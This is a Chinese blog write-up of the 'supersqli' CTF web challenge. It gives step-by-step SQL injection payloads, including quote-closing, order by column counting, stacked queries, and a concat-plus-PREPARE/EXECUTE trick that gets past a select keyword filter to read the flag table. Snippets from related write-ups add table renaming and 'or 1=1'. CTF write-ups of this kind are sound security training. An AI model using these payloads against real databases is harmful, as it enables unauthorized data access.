攻防世界 web进阶区 supersqli

最新推荐文章于 2024-07-12 15:01:24 发布
最新推荐文章于 2024-07-12 15:01:24 发布
阅读量163 收藏 1
点赞数 2
分类专栏: ctf web题 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51395584/article/details/125309821
版权

攻防世界 web进阶区 supersqli

根据题目以及提示内容,猜测该题是SQL注入的。打开链接,确实有一个输入框。
在这里插入图片描述
直接进行输入库的常用闭合符号试试,没想到直接用“'”这个符号成功了,直接给出了报错信息。
在这里插入图片描述

然后就是将后面的内容注释看看是否可行,经过测试 --+无法正确闭合,但是#可以正常地输出内容,由此可知,注释符号为#

1'#

在这里插入图片描述
下一步测试order by爆出当前表有几个字段

1' order by 2 #

在这里插入图片描述
当后面的值为3时,给出了报错信息,由此可知,当前表有两个字段。

1' order by 3 #

在这里插入图片描述
然后使用联合查询看看,直接给出了提示信息,直接将我们的关键字给过滤了。只能尝试其他注入方式了

1' union select 1,2 #

在这里插入图片描述
经过多次尝试之后,确定是使用堆叠注入。

1'; show database #

在这里插入图片描述
查询当前所在数据库有哪些表

1'; show tables #

在这里插入图片描述
查询表的字段,在当前数据库1919810931114514这个表中发现flag字段。

1' ;show columns from `1919810931114514`#

在这里插入图片描述
查询该flag字段的内容得到flag

因为select被过滤了,我们可以使用concat()方法将select拆分开再拼接起来就可以了

1';set @sql=concat('sel','ect flag from `1919810931114514`');PREPARE st1 FROM @sql;EXECUTE st1#

在这里插入图片描述
最后得到flag为:flag{c168d583ed0d4d7196967b28cbd0b5e9}

小皮hai
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界(web篇)---supersqli
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-09 784
一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法先把原来的words表名字改成别的,再将1919810931114514表的名字改为words再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)然后我们用1’ or 1=1 --+直接就能得到flag...
攻防世界Websupersqli
Light_inthe_eyes的博客
10-15 133
题目名字提示就是SQL注入 先输入1,有回显: 判断注入类型,1'报错,1'#正常回显,说明时单字符类型注入: 判断字段的数量,1' order by 2#正常回显,1' oreder by 3#报错,说明字段量为2: 用union去 select查询,1' union select 1,database()#,发现被preg_match过滤了:正则表达式过滤了这些,那么只有采取其他方式进行注入,尝试用堆叠注入:1';show tables;#,发现有回显: 爆1919810931114514的字段:
攻防世界web--supersqli
m0_60715541的博客
10-27 324
一道攻防世界上面的sql注入
攻防世界supersqli做题思路(堆叠注入,select绕过)
最新发布
2301_80307383的博客
07-12 548
测试可知,words中的id有正常回显,可把flag所在的表和列改名为id所在的表和列。在尝试大小写,双写,加注释也没能绕过select,尝试堆叠注入。prepare用于预备一个语句,并赋予名称,以后可以引用该语句。打开题目,在已知为sql注入时,先测试闭合方式,输入1\。发现报错,接着尝试1' 和 1" 测试出闭合方式为单引号。接着访问1' or 1#即可得到flag。
攻防世界 Web supersqli 详解(堆叠注入)
qq_70394438的博客
09-04 913
攻防世界题目supersqli详解,SQL注入、手动注入、堆叠注入详细流程
supersqli_攻防世界
u014794949
10-23 416
进入题目发现是文本框提交,通过尝试确定闭合字符和注入点 order by确定存在2个字段 1' order by 2# union select查询发现关键字过滤 通过堆叠注入得到库名 1';show databases;# 尝试得到表名 1';show tables;# 尝试得到两表中的列名 1';show columns from `1919810931114514`;# 1';show columns from `words`;# flag列中比较可能存放答案,words表里
攻防世界web进阶supersqli
gongjingege的博客
07-25 1872
打开链接,初步判断应该是sql注入 顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入 先1’,报错 再–+,发现被正则过滤,大小写也不行 看了看大佬的wp,堆叠注入(呜,新名词。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下这几个表 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为表名操作时要加反
攻防世界-web进阶
楼阁de猫的博客
10-30 974
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界Web进阶3(4分5分题)
chuxuezheerer的博客
02-19 1419
一.supersqli 二.FlatScience 三.easytornado 四.Cat 五.ics-04 六.shrine 七.ics-05
攻防世界-web高手进阶
zji
04-25 6516
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界web解题[进阶](二)
weixin_46703850的博客
03-05 728
攻防世界web解题[进阶](二)
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
supersqli-攻防世界
szhangliwenya的博客
03-30 2144
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入:堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
攻防世界——supersqli
weixin_62281892的博客
09-18 1843
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界supersqli
zara_anna的博客
07-27 225
假设注入类型为数字型,注入点为id,分别输入上面的语句,那么第一行测试语句会返回id为1的查询结果,而第二行语句由于条件and 1=2不成立,所以查询结果为空。如果注入类型为字符型,将上面语句拼接到sql中,由于id的值都不匹配,所以应该是都不返回任何结果,但是如果id本身是int类型,实际查询过程中是会返回结果的,这可能是因为对输入的字符进行了截断并转换了类型,造成1 and 1=2在字符类型中会返回id为1的查询结果。
攻防世界supersqli
qq_44111753的博客
11-16 347
攻防世界 supersqli 题目 WP: 输入1、2、3提交 发现输入的数值提交到inject 发现inject存在sql注入风险 尝试堆叠注入 发现数据库 查看supersqli中的表 发现两个表 尝试查询表内的所有内容 发现对select|update|delete|drop|insert|where进行了过滤 继续查看字段 发现1919810931114514表中的flag,但无法使用select语句,不能直接输入,但发现words表中的id属性和输入的参数inject很相似,都为整型
攻防世界-web-supersqli
wuh2333的博客
06-07 941
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
攻防世界---web---supersqli
2201_75556700的博客
05-18 516
5、这里可以使用堆叠绕过(以分号来隔开每一次的sql语句的查询),查数据库名,再结合题目的提示可知,我们要找的信息在"supersqli"这个数据库中。6、查询"supersqli"数据库中的表名,使用下面的方法,查到了两张表。8、看到了flag字段,接着查询flag字段里面的信息。7、查询字段,由于表名是字符串,所以需要用``反引号。2、判断注入点,这里输入1'报错了,说明存在注入点。4、查看数据库名,这里发现select被过滤了。3、查看列数,根据结果显示可知,有2列。的表,并将其命名为 p。
攻防世界supersqli
08-09
Supersqli是一种强大的SQL注入攻击技术,它可以绕过应用程序的安全机制并获取未经授权的访问权限。攻击者可以通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。 为了防御Supersqli攻击,开发人员可以采取以下措施: 1. 输入验证和过滤:对于所有用户输入的数据,进行严格的验证和过滤,确保只接受预期的数据类型和格式。 2. 使用参数化查询:使用参数化查询或预编译语句,而不是直接拼接用户输入的数据到SQL语句中。这样可以防止SQL注入攻击成功。 3. 最小权限原则:数据库用户应该具有最低权限来执行操作,以限制攻击者在成功注入后能够执行的操作范围。 4. 错误消息处理:不要向用户显示详细的错误消息,因为攻击者可能会利用这些错误消息来获取有关数据库结构和查询的信息。 5. 定期更新和漏洞扫描:及时更新应用程序和数据库,以确保已修复已知的漏洞,并对应用程序进行定期的漏洞扫描。 这些是一些常见的防御措施,但是请注意,没有绝对安全的系统,因此需要综合考虑多个安全层面来保护应用程序和数据库
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值